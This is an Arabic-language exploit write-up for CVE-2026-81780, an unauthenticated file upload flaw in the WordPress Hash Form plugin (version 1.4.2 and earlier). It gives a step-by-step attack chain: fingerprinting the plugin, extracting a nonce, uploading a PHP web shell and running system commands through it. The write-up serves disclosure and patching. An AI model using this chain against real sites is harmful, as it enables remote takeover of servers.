
استغلال لثغرة CVE-2026-81780: رفع ملفات غير مصادق عليه في إضافة WordPress Hash Form يؤدي إلى تنفيذ تعليمات برمجية عن بُعد عبر حمولات PHP مصممة خصيصًا.
CVE-2026-81780 — ثغرة تنفيذ الأكواد عن بُعد في Hash Form
الثغرة
رفع ملفات غير مصادق عليه في إضافة Hash Form لووردبريس (≤ 1.4.2). تسمح الإضافة برفع ملفات عشوائية دون مصادقة مناسبة أو التحقق من نوع الملف، مما يؤدي إلى تنفيذ الأكواد عن بُعد (RCE).
سلسلة الاستغلال
الخطوة الإجراء 1 يتحقق المهاجم من إضافة Hash Form عبر readme.txt 2 يستخرج ajax_nounce من خلال معاينة النماذج (hashform_preview) 3 يرسل طلب POST إلى hashform_file_upload_action مع حمولة PHP 4 يرفع قشرة ويب بصيغة .phar أو .phtml أو .php5 أو .php7 5 يشغّل القشرة بالوصول إلى /wp-content/uploads/hashform/temp/v.{ext} 6 ينفّذ أوامر النظام عبر ?c=id
GET /wp-content/plugins/hash-form/readme.txt
↓
تم اكتشاف الإصدار (≤ 1.4.2)
↓
GET /wp-admin/admin-ajax.php?action=hashform_preview&form=1
↓
استخراج Nonce: ajax_nounce=...
↓
POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action
↓
الرفع: v.phar (أو .phtml أو .php5 أو .php7)
↓
GET /wp-content/uploads/hashform/temp/v.phar?c=id
↓
تم تنفيذ الأمر (uid=www-data)```